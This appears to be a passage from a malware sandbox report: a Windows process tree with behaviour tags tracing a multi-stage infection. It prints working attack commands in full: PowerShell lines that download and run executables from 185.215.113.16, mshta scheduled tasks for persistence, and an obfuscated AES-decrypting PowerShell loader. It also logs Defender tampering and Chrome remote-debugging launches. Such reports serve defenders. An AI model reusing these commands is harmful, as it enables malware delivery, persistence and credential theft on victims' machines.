C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"5⤵
- Executes dropped EXE
PID:5224
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵
- Executes dropped EXE
PID:6088
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵
- Executes dropped EXE
PID:5028
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵
- Executes dropped EXE
PID:5124
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 9846⤵
- Program crash
PID:2772
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3900 -
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 8006⤵
- Program crash
PID:1476
-
-
-
C:\Users\Admin\AppData\Local\Temp\10009190101\468c3dbc43.exe"C:\Users\Admin\AppData\Local\Temp\10009190101\468c3dbc43.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6096
-
-
C:\Users\Admin\AppData\Local\Temp\10009200101\1c29bfe45e.exe"C:\Users\Admin\AppData\Local\Temp\10009200101\1c29bfe45e.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5468 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵PID:5180
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088694101\221457afdd.exe"C:\Users\Admin\AppData\Local\Temp\1088694101\221457afdd.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1584 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn EDMivma1TWu /tr "mshta C:\Users\Admin\AppData\Local\Temp\LnB8583DG.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:2632 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn EDMivma1TWu /tr "mshta C:\Users\Admin\AppData\Local\Temp\LnB8583DG.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4256
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\LnB8583DG.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168 -
C:\Users\Admin\AppData\Local\TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE"C:\Users\Admin\AppData\Local\TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1088695021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:1720 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1088695021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
PID:812 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:3000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:4800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:1256 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "82vemmaWa97" /tr "mshta \"C:\Temp\zMJbN9lK6.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:5008
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\zMJbN9lK6.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1060 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3976
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088713001\f8fc74dfc3.exe"C:\Users\Admin\AppData\Local\Temp\1088713001\f8fc74dfc3.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:820 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4856 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd4e03cc40,0x7ffd4e03cc4c,0x7ffd4e03cc585⤵PID:768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,5663598663383437870,11600931656437465412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1912 /prefetch:25⤵PID:2744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,5663598663383437870,11600931656437465412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2176 /prefetch:35⤵PID:4760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2216,i,5663598663383437870,11600931656437465412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2468 /prefetch:85⤵PID:1452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,5663598663383437870,11600931656437465412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:15⤵
- Uses browser remote debugging
PID:2364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,5663598663383437870,11600931656437465412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:15⤵
- Uses browser remote debugging
PID:1780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,5663598663383437870,11600931656437465412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:15⤵
- Uses browser remote debugging
PID:5316
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1612
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 820 -s 13164⤵
- Program crash
PID:5196
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088714001\47fce15d5f.exe"C:\Users\Admin\AppData\Local\Temp\1088714001\47fce15d5f.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\1088715001\6537eca44e.exe"C:\Users\Admin\AppData\Local\Temp\1088715001\6537eca44e.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4864
-
-
C:\Users\Admin\AppData\Local\Temp\1088716001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1088716001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3388 -
C:\Users\Admin\AppData\Local\Temp\1088716001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1088716001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
PID:3900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3388 -s 9444⤵
- Program crash
PID:1872
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088717001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1088717001\NL58452.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\1088717001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1088717001\NL58452.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 7884⤵
- Program crash
PID:4880
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088718001\dzvh4HC.exe"C:\Users\Admin\AppData\Local\Temp\1088718001\dzvh4HC.exe"3⤵
- Executes dropped EXE
PID:5412
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1088719041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6012 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵
- System Location Discovery: System Language Discovery
PID:1772 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵PID:3416
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5260
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088720001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1088720001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5568 -
C:\Users\Admin\AppData\Local\Temp\1088720001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1088720001\7aencsM.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:1616 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2428 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd4e03cc40,0x7ffd4e03cc4c,0x7ffd4e03cc586⤵PID:1364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,16929490049933653092,7190036949457345096,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1916 /prefetch:26⤵PID:5840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,16929490049933653092,7190036949457345096,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2184 /prefetch:36⤵PID:5920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,16929490049933653092,7190036949457345096,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2272 /prefetch:86⤵PID:5956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,16929490049933653092,7190036949457345096,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3212 /prefetch:16⤵
- Uses browser remote debugging
PID:2516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,16929490049933653092,7190036949457345096,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3244 /prefetch:16⤵
- Uses browser remote debugging
PID:5168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4504,i,16929490049933653092,7190036949457345096,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4468 /prefetch:16⤵
- Uses browser remote debugging
PID:4868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3708,i,16929490049933653092,7190036949457345096,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4284 /prefetch:86⤵PID:6056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4796,i,16929490049933653092,7190036949457345096,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4804 /prefetch:86⤵PID:6096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5024,i,16929490049933653092,7190036949457345096,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5016 /prefetch:86⤵PID:4512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4812,i,16929490049933653092,7190036949457345096,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4888 /prefetch:86⤵PID:2364
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5568 -s 9564⤵
- Program crash
PID:3628
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088721001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1088721001\f3Ypd8O.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5648 -
C:\Users\Admin\AppData\Local\Temp\1088721001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1088721001\f3Ypd8O.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 7884⤵
- Program crash
PID:2948
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088722001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1088722001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1780
-
-
C:\Users\Admin\AppData\Local\Temp\1088723001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1088723001\9aiiMOQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2864 -
C:\Users\Admin\AppData\Local\Temp\1088723001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1088723001\9aiiMOQ.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 8004⤵
- Program crash
PID:456
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088724001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1088724001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4304
-
-
C:\Users\Admin\AppData\Local\Temp\1088725001\0d60014756.exe"C:\Users\Admin\AppData\Local\Temp\1088725001\0d60014756.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5644
-
-
C:\Users\Admin\AppData\Local\Temp\1088726001\1c29bfe45e.exe"C:\Users\Admin\AppData\Local\Temp\1088726001\1c29bfe45e.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:780
-
-
